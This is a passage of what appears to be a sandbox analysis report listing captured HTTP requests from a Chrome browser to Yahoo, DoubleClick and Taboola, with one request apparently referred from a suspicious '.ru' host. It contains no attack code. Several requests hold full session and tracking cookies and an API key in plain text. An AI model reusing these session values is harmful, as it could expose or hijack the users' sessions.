Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202409240101/pubads_impl.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-games.GamesMini.atomic.ltr.be03a375386175922f163856820e511b.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-games.games-mini.cdd5050ba6288df47182412e30e482a4.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=Shopping&m_id=react-wafer-shopping&m_mode=json&partner=none HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=WeatherPreviewRefresh&lang=en-US&m_id=react-wafer-weather&m_mode=json&region=US&rid=1pa4ckpjflnfm&site=fp&apptype=default&instance_id=weather&_evtSrc=deferLoad HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=GamesMini&lang=en-US&m_id=react-wafer-games&m_mode=json&region=US&rid=1pa4ckpjflnfm&site=fp&apptype=default&instance_id=games&_evtSrc=deferLoad HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
Source: global trafficHTTP traffic detected: GET /ups/58831/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC="19cw~2kzt:19e0~2kzt"; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B
Source: global trafficHTTP traffic detected: GET /ups/58824/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC="19cw~2kzt:19e0~2kzt"; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B
Source: global trafficHTTP traffic detected: GET /static/22/228515c2-9c18-491a-a142-95df43dd9630.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /static/impl/css/GTAmerica_2024-03-27.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /static/6b/6b91a1bc-8217-4d34-9774-28dc8fd0cd05.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /static/impl/css/yahoo_cr3_beta.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /yahoo-home/trc/3/json?llvl=2&tim=13%3A21%3A03.493&lti=trecs&pubit=n&t=1&data=%7B%22cmps%22%3A0%2C%22ga%22%3Afalse%2C%22cex%22%3A%22false%22%2C%22id%22%3A%2272148%22%2C%22sd%22%3A%22%22%2C%22ui%22%3A%22%22%2C%22ii%22%3A%22_homepage_%22%2C%22it%22%3A%22home%22%2C%22vi%22%3A1727716863493%2C%22cv%22%3A%2220240929-12-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fwww.yahoo.com%2F%22%2C%22qs%22%3A%22%22%2C%22bv%22%3A%220%22%2C%22btv%22%3A%220%22%2C%22ul%22%3A%5B%22en-US%22%2C%22en%22%5D%2C%22ccpa_ps%22%3A%221YNN%22%2C%22cos%22%3A%223g%22%2C%22e%22%3A%22https%3A%2F%2Fhfj.rontishet.ru%2F%22%2C%22bu%22%3A%22https%3A%2F%2Fwww.yahoo.com%2F%22%2C%22vpi%22%3A%22%2F%22%2C%22bad%22%3A-1%2C%22sw%22%3A1280%2C%22sh%22%3A984%2C%22bw%22%3A1280%2C%22bh%22%3A907%2C%22dw%22%3A1263%2C%22dh%22%3A5318%2C%22sde%22%3A%221.000%22%2C%22lt%22%3A%22trecs%22%2C%22nsid%22%3A%22yahooweb-network%22%2C%22pblob%22%3A%22cobrand%3Anone%3Bcolo%3Abf1%3Bdevice%3Adesktop%3Blang%3Aen-US%3Blu%3A0%3Bpt%3Ahome%3Bregion%3AUS%3Bsite%3Afp%3Bver%3Amegastrm%7C%7C2023538075%7C%7C%7C%7C900%2Cseamless%7C%22%2C%22r%22%3A%5B%7B%22li%22%3A%22rbox-h2m%22%2C%22uip%22%3A%22taboola-stream-2%22%2C%22orig_uip%22%3A%22taboola-stream-2%22%2C%22s%22%3A1%2C%22uim%22%3A%22stream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%22%2C%22cd%22%3A1016.92%2C%22mw%22%3A899%7D%2C%7B%22li%22%3A%22rbox-h2m%22%2C%22uip%22%3A%22taboola-stream-8%22%2C%22orig_uip%22%3A%22taboola-stream-8%22%2C%22s%22%3A1%2C%22uim%22%3A%22stream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%22%2C%22cd%22%3A1847.92%2C%22mw%22%3A899%7D%5D%2C%22uad%22%3A%7B%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0.0%22%2C%22uaFullVersion%22%3A%22117.0.5938.132%22%7D%2C%22cacheKey%22%3A%22home%3D_homepage_%2Ctaboola-stream-2%3Dstream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%2Ctaboola-stream-8%3Dstream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%22%2C%22_cn%22%3A%22tions_1%22%2C%22lbt%22%3A1727702800734%2C%22wc%22%3Atrue%2C%22pa%22%3A%7B%22en%22%3Atrue%2C%22su%22%3Atrue%7D%7D HTTP/1.1Host: trc.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: taboola_session_id=v2_180b7abcdacfe26a5edf97d1d328e529_27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380_1727716864_1727716864_CIi3jgYQm9teGIXczJ-kMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiOuMvY8NrPu1twAYABAA; t_pid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380
Source: global trafficHTTP traffic detected: GET /ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC="19cw~2kzt:19e0~2kzt"; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A
Source: global trafficHTTP traffic detected: GET /1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66bae12e060a4a66536126f26e6cf8 HTTP/1.1Host: api.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-form-1.34.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-native-da-1.0.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ups/58831/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC="19cw~2kzt:19e0~2kzt"; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A
Source: global trafficHTTP traffic detected: GET /ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC="19cw~2kzt:19e0~2kzt:19ea~2kzt"; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-action-1.8.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-template-1.4.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-menu-1.3.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yahooweb-network/load.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
